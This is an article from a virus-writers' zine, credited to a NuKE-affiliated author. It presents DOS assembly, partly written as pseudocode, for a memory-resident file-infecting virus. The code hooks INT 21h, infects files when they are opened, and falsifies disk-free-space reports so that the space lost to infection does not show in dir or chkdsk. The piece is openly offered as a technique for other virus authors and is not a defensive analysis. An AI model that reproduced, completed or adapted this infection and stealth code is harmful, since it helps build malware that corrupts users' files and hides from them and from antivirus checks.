New Neat Stuff From The Vx...
                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

; Stealth.asm, idea and code written by <<-- Viper -->>
;
; function - To demonstrate a new form of stealth
; purpose -  To actively monitor the infection of files, so that the
;            total disk space reported can appear the same by a dir
;            and other commands, as well as chkdsk reporting things such as
;            allocation units, space, etc. the same...
;
; Note:      This form of stealth works starting on memory residency, and i
;            reset each reboot, or memory loss...
;
; Function Idea and Code written by <<-- Viper -->> for Rock Steady & [NuKE
; -------------------------------------------------------------------------

.model tiny
.radix 16
.code

        org 100


virus:
        check_if_installed
        install_if_not_already (get, save, trace vectors and all other stuf
        quit_to_host_program

21_handler:
        cmp ah,3dh
        je open
        cmp ah,36
        je NEW_STEALTH_PART2

; 3d 21_handler (infect_file on open) Just an example, could be done with
; anything (eg, close, 4b, etc...)

open:
        open_file
        save original bytes
        infect file
        jump if error --> fuckit

NEW_STEALTH_PART1:              ; always do the stealth calcs right
                                ; after a new file has been infected

        push ax
        push bx
        push cx
        etc...

        mov ax,3600
        xor dl,dl
        call old21

; ax=sec/cluster, bx=available clusters, cx=bytes/sector, dx=total/clusters

        mov cs:[rax],ax
        mov cs:[rbx],bx
        mov cs:[rcx],cx
        mov cs:[rdx],dx

        mul ax,cx       ; this gives bytes/allocation unit
        xchg ax,bx
        mov dx,significant reg of filesize ; (saved from previous int)
        mov ax,insignficant reg of filesize; (saved from previous int)
        div bx          ; ax = dx:ax=filesize / bx=bytes/alloc
        cmp ax,0        ; ax = # of alloc units
        je smaller_than_1_alloc
        cmp dx,0
        je exact_divide
        inc ax
        mul ax,bx       ; dx:ax=largest # bytes b4 next cluster used
        mov cx,significant reg of filesize
        mov bx,insignificant reg of filesize ; cx:bx=filesize
        sub dx,cx
        sub ax,bx       ; now dx:ax is left with 0:#bytes before next clust
        mov bx,ax       ; put ax into bx so that the same code can be used
                        ; over...
        jmp not_exact_divide_and_larger_than_0_allocs

exact_divide:
        inc cs:[cluster_loss_due_to_infect] ; because our virus > 0 bytes
        jmp fuckit      ; were done our work (in this case, anyways)

smaller_than_1_alloc:
        sub bx,dx
not_exact_divide_and_larger_than_0_allocs:
        cmp bx,virus_size
        jge fuckit      ; no need for adjustment because virus is the same
                        ; or smaller size than the # of bytes left in
                        ; that available cluster
        inc cs:[cluster_loss_due_to_infect]

fuckit:

        etc...
        pop cx
        pop bx
        pop ax

        restore stuff (other registers, and callers program stuff)
        iret

NEW_STEALTH_PART2:

        call old21
        add bx,cs:[cluster_loss_due_to_infect] ; lie about how many cluster
                                               ; used, and the space left
                                               ; on the hard drive...
        iret

old21:
        pushf
        callf
        old21vector     dd      ?
        ret

rax     dw      ?
rbx     dw      ?
rcx     dw      ?
rdx     dw      ?
cluster_loss_due_to_infect      dw      0

end_virus